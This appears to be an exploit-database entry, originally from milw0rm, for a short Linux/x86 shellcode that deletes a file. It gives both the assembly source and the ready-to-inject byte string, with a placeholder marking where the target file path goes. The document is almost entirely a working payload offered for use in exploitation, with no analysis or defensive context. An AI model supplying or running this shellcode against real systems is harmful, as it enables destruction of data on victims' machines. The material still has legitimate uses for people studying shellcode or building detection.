Linux/x86 - File Unlinker Shellcode (18+ bytes)
Author: darkjoker
type:
platform: linux_x86
port: 18.0
date_added: 2009-03-02
date_updated: 2017-07-11
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
/*
Author : darkjoker
Site : http://darkjoker.net23.net
Shellcode : linux/x86 File unlinker 18 bytes + file path length
.global _start
_start:
jmp one
two:
pop %ebx
movb $0xa,%al
int $0x80
movb $0x1, %al
xor %ebx, %ebx
int $0x80
one:
call two
.string "file"
*/
char main [] =
"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0"
"\x01\x31\xdb\xcd\x80\xe8\xf0\xff"
"\xff\xff"
"file" //Here file path to delete
// milw0rm.com [2009-03-03]